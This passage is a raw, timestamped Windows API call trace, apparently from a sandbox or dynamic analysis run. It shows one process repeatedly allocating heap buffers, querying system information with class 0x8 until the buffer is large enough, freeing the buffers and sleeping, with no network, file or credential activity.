hHeap=0x2560000) returned 1 [0250.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0250.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0250.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0250.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0250.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.784] Sleep (dwMilliseconds=0x110) [0250.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0250.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0250.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0250.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0250.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0250.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0250.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0250.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0250.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.797] Sleep (dwMilliseconds=0x110) [0250.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0250.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0250.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0250.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0250.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0250.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0250.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0250.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0250.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.816] Sleep (dwMilliseconds=0x110) [0250.836] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0250.836] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0250.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0250.837] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0250.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0250.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0250.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0250.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0250.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.843] Sleep (dwMilliseconds=0x110) [0250.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0250.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0250.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0250.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0250.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0250.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0250.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0250.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0250.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.865] Sleep (dwMilliseconds=0x110) [0250.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0250.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0250.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0250.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0250.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0250.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0250.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0250.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0250.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.875] Sleep (dwMilliseconds=0x110) [0250.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0250.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0250.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0250.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0250.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0250.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0250.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0250.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0250.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.895] Sleep (dwMilliseconds=0x110) [0250.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0250.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0250.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0250.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0250.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0250.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0250.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0250.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0250.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.911] Sleep (dwMilliseconds=0x110) [0250.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0250.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0250.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0250.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0250.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0250.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0250.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0250.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0250.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.943] Sleep (dwMilliseconds=0x110) [0250.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0250.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0250.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0250.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0250.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0250.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0250.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0250.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0250.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.954] Sleep (dwMilliseconds=0x110) [0250.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0250.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0250.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0250.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0250.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0250.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0250.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0250.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0250.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.971] Sleep (dwMilliseconds=0x110) [0250.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0250.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0250.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0250.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0250.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0250.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0250.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0250.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0250.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.985] Sleep (dwMilliseconds=0x110) [0250.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0250.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0250.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0250.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0250.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0251.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0251.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0251.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0251.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.004] Sleep (dwMilliseconds=0x110) [0251.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0251.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0251.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0251.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0251.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0251.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0251.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0251.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0251.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.019] Sleep (dwMilliseconds=0x110) [0251.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0251.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0251.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0251.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: 